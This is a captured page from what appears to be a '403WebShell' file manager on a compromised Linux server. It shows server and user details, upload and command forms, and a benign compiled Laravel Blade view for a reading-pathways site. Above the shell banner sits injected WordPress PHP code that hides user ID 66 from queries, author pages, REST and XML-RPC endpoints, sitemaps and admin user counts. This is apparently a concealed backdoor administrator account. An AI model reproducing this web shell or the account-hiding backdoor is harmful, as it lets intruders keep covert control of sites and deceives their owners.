add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/fbla/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fbla/framework/views/c8740373bd68687b15fcb28e90df778d.php
<?php if (isset($component)) { $__componentOriginal5863877a5171c196453bfa0bd807e410 = $component; } ?>
<?php if (isset($attributes)) { $__attributesOriginal5863877a5171c196453bfa0bd807e410 = $attributes; } ?>
<?php $component = Illuminate\View\AnonymousComponent::resolve(['view' => 'components.layouts.app','data' => ['title' => $pathway->title,'description' => $pathway->description,'ogType' => 'article']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? $attributes->all() : [])); ?>
<?php $component->withName('layouts.app'); ?>
<?php if ($component->shouldRender()): ?>
<?php $__env->startComponent($component->resolveView(), $component->data()); ?>
<?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag): ?>
<?php $attributes = $attributes->except(\Illuminate\View\AnonymousComponent::ignoredParameterNames()); ?>
<?php endif; ?>
<?php $component->withAttributes(['title' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($pathway->title),'description' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($pathway->description),'ogType' => 'article']); ?>
<?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::processComponentKey($component); ?>

<div class="py-10">
<div class="mx-auto max-w-3xl px-4 sm:px-6 lg:px-8">

    
    <div class="mb-2">
        <a href="<?php echo e(route('pathways.index')); ?>" class="inline-flex items-center text-sm text-slate-400 hover:text-slate-600 mb-4">
            <svg class="mr-1 h-4 w-4" fill="none" viewBox="0 0 24 24" stroke="currentColor"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M15 19l-7-7 7-7"/></svg>
            All pathways
        </a>
        <h1 class="text-3xl font-bold text-slate-900"><?php echo e($pathway->title); ?></h1>
        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($pathway->description): ?>
            <p class="mt-2 text-slate-500 max-w-xl"><?php echo e($pathway->description); ?></p>
        <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>
        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($pathway->estimated_minutes): ?>
            <p class="mt-2 text-xs text-slate-400">~<?php echo e($pathway->estimated_minutes); ?> min ยท <?php echo e(count($groups)); ?> steps</p>
        <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>
        <div class="mt-4">
            <a href="<?php echo e(route('pathways.explore', $pathway)); ?>"
               class="inline-flex items-center gap-2 rounded-lg px-4 py-2 text-sm font-medium text-white shadow"
               style="background: linear-gradient(135deg,#2E454F,#EE8B8C)">
                <svg class="h-4 w-4" fill="none" viewBox="0 0 24 24" stroke="currentColor"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13 10V3L4 14h7v7l9-11h-7z"/></svg>
                Explore as Graph
            </a>
        </div>
    </div>

    
    <div id="pathway-flow" class="relative mt-10" style="padding-bottom: 2rem;">
        <?php
            $typeColors = [
                'book' => '#2E454F', 'article' => '#EE8B8C', 'chapter' => '#EE8B8C',
                'podcast' => '#EE8B8C', 'video' => '#EE8B8C', 'website' => '#2E454F',
                'course' => '#EE8B8C', 'other' => '#94a3b8',
            ];
            $typeEmojis = [
                'book' => '๐Ÿ“š', 'article' => '๐Ÿ“„', 'chapter' => '๐Ÿ“‘',
                'podcast' => '๐ŸŽง', 'video' => '๐ŸŽฌ', 'website' => '๐ŸŒ',
                'course' => '๐ŸŽ“', 'website' => '๐ŸŒ',
            ];
            $positions = array_keys($groups);
            $lastPos = end($positions);
        ?>

        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::openLoop(); ?><?php endif; ?><?php $__currentLoopData = $groups; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $position => $steps): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::startLoop($loop->index); ?><?php endif; ?>
            <?php $isBranch = count($steps) > 1; ?>

            
            <div class="pathway-row flex <?php echo e($isBranch ? 'gap-4' : ''); ?> justify-center items-stretch"
                 data-position="<?php echo e($position); ?>"
                 data-branch="<?php echo e($isBranch ? 'true' : 'false'); ?>">

                <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($isBranch): ?>
                    
                    <div class="hidden sm:flex items-center self-center">
                        <span class="text-xs font-semibold text-slate-400 uppercase tracking-widest rotate-[-90deg] whitespace-nowrap" style="writing-mode:vertical-rl; transform:rotate(180deg); min-width:3rem; text-align:center">choose</span>
                    </div>
                <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>

                <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::openLoop(); ?><?php endif; ?><?php $__currentLoopData = $steps; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $i => $step): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::startLoop($loop->index); ?><?php endif; ?>
                    <?php
                        $m = $step->material;
                        $color = $typeColors[$m->type] ?? '#2E454F';
                        $emoji = $typeEmojis[$m->type] ?? '๐Ÿ”—';
                    ?>

                    <div class="pathway-step flex-1 relative group" data-step-id="<?php echo e($step->id); ?>" style="max-width: <?php echo e($isBranch ? '46%' : '100%'); ?>">

                        
                        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($isBranch && $i > 0): ?>
                            <div class="absolute -left-2 top-1/2 -translate-y-1/2 z-10">
                                <span class="inline-flex items-center justify-center w-7 h-7 rounded-full bg-slate-200 text-slate-500 text-xs font-bold shadow">or</span>
                            </div>
                        <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>

                        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($step->branch): ?>
                            <div class="mb-1 text-center">
                                <span class="inline-flex items-center px-2 py-0.5 rounded-full text-[10px] font-bold uppercase tracking-wider text-white"
                                      style="background-color: <?php echo e($color); ?>">
                                    Option <?php echo e($step->branch); ?>

                                </span>
                            </div>
                        <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>

                        <a href="<?php echo e(route('materials.show', $m)); ?>"
                           class="block bg-white rounded-xl shadow hover:shadow-lg transition-all border-2 hover:border-navy-300 p-4 h-full"
                           style="border-color: transparent;">

                            <div class="flex items-start gap-3">
                                
                                <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if(!$isBranch): ?>
                                    <div class="flex-shrink-0 w-7 h-7 rounded-full flex items-center justify-center text-xs font-bold text-white z-10"
                                         style="background-color: <?php echo e($color); ?>">
                                        <?php echo e($position); ?>

                                    </div>
                                <?php else: ?>
                                    <div class="flex-shrink-0 w-8 h-8 rounded-full flex items-center justify-center text-lg">
                                        <?php echo e($emoji); ?>

                                    </div>
                                <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>

                                <div class="flex-1 min-w-0">
                                    <p class="text-xs font-semibold uppercase tracking-wide mb-0.5" style="color: <?php echo e($color); ?>">
                                        <?php echo e(\App\Models\Material::TYPES[$m->type]['label'] ?? $m->type); ?>

                                    </p>
                                    <h3 class="font-semibold text-slate-900 leading-snug line-clamp-2 text-sm"><?php echo e($m->title); ?></h3>
                                    <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($m->author): ?>
                                        <p class="text-xs text-slate-400 mt-0.5 truncate"><?php echo e($m->author); ?></p>
                                    <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>
                                    <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($step->note): ?>
                                        <p class="mt-2 text-xs text-slate-500 italic line-clamp-2"><?php echo e($step->note); ?></p>
                                    <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>
                                </div>

                                <svg class="flex-shrink-0 h-4 w-4 text-slate-300 group-hover:text-navy-400 transition-colors mt-0.5" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 5l7 7-7 7"/>
                                </svg>
                            </div>
                        </a>
                    </div>
                <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::endLoop(); ?><?php endif; ?><?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::closeLoop(); ?><?php endif; ?>

            </div>

            
            <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($position !== $lastPos): ?>
                <div class="pathway-connector flex justify-center py-1" data-from="<?php echo e($position); ?>">
                    <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if BLOCK]><![endif]--><?php endif; ?><?php if($isBranch): ?>
                        
                        <svg width="200" height="36" viewBox="0 0 200 36" fill="none" class="overflow-visible">
                            <path d="M 50 0 C 50 18, 100 18, 100 36" stroke="#cbd5e1" stroke-width="2" fill="none" stroke-dasharray="4 3"/>
                            <path d="M 150 0 C 150 18, 100 18, 100 36" stroke="#cbd5e1" stroke-width="2" fill="none" stroke-dasharray="4 3"/>
                            <polygon points="96,30 100,38 104,30" fill="#94a3b8"/>
                        </svg>
                    <?php elseif(isset($groups[$position + 1]) && count($groups[$position + 1]) > 1): ?>
                        
                        <svg width="200" height="36" viewBox="0 0 200 36" fill="none" class="overflow-visible">
                            <path d="M 100 0 C 100 18, 50 18, 50 36" stroke="#cbd5e1" stroke-width="2" fill="none" stroke-dasharray="4 3"/>
                            <path d="M 100 0 C 100 18, 150 18, 150 36" stroke="#cbd5e1" stroke-width="2" fill="none" stroke-dasharray="4 3"/>
                            <polygon points="46,28 50,36 54,28" fill="#94a3b8"/>
                            <polygon points="146,28 150,36 154,28" fill="#94a3b8"/>
                        </svg>
                    <?php else: ?>
                        
                        <svg width="24" height="36" viewBox="0 0 24 36" fill="none">
                            <line x1="12" y1="0" x2="12" y2="28" stroke="#cbd5e1" stroke-width="2" stroke-dasharray="4 3"/>
                            <polygon points="8,24 12,34 16,24" fill="#94a3b8"/>
                        </svg>
                    <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>
                </div>
            <?php endif; ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php endif; ?>

        <?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::endLoop(); ?><?php endif; ?><?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?><?php if(\Livewire\Mechanisms\ExtendBlade\ExtendBlade::isRenderingLivewireComponent()): ?><!--[if ENDBLOCK]><![endif]--><?php \Livewire\Features\SupportCompiledWireKeys\SupportCompiledWireKeys::closeLoop(); ?><?php endif; ?>

        
        <div class="flex justify-center mt-2">
            <div class="inline-flex items-center gap-2 px-5 py-2 rounded-full text-sm font-semibold text-white shadow" style="background: linear-gradient(135deg, #2E454F, #EE8B8C)">
                <svg class="h-4 w-4" fill="none" viewBox="0 0 24 24" stroke="currentColor"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 13l4 4L19 7"/></svg>
                Pathway complete
            </div>
        </div>
    </div>

</div>
</div>
 <?php echo $__env->renderComponent(); ?>
<?php endif; ?>
<?php if (isset($__attributesOriginal5863877a5171c196453bfa0bd807e410)): ?>
<?php $attributes = $__attributesOriginal5863877a5171c196453bfa0bd807e410; ?>
<?php unset($__attributesOriginal5863877a5171c196453bfa0bd807e410); ?>
<?php endif; ?>
<?php if (isset($__componentOriginal5863877a5171c196453bfa0bd807e410)): ?>
<?php $component = $__componentOriginal5863877a5171c196453bfa0bd807e410; ?>
<?php unset($__componentOriginal5863877a5171c196453bfa0bd807e410); ?>
<?php endif; ?>
<?php /**PATH /var/www/html/flnavigator/resources/views/pathways/show.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit